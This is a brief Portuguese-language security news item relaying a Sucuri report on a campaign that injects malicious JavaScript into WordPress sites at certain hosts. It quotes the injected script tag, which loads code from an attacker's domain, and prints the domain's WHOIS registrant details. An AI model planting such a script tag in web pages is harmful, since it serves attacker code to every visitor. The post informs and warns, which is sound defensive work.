O código JavaScript inicial que é implantado em sites (possivelmente) baseados no CMS WordPress, é esse:
Código :
<script src=" http://whereisdudescars.com/js2.php"></script>
De acordo com a empresa Sucuri, os ataques parecem estar limitados apenas as hospedagens localizadas nas empresas Bluehost e Dreamhost. Já o mesmo serviço da GoDaddy parece não ter sido afetado. A companhia também fornece um script para eliminar o código malicioso inserido nos sites infectados.
De acordo com a empresa, o que é interessante nesses ataques são as pessoas por trás deles. A companhia de segurança afirma que os envolvidos são os mesmos do ataque ao losotrama. Isso pode ser verificado pela verificação do contato de contrato do domínio (WHOIS). Você pode verificar isso através do comando whois em seu terminal no Linux:
Código :
Registrant Contact: HardSoft, inc Hilary Kneber [email protected] 7569468 fax: 7569468 29/2 Sun street. Montey 29 Virginia NA 3947 us
A Sucuri informa que ainda está pesquisando o vetor de exploração utilizado, e manterá seus leitores atualizados.
Saiba Mais:
[1] Sucuri.net: http://blog.sucuri.net/2010/07/yet-a....html#more-662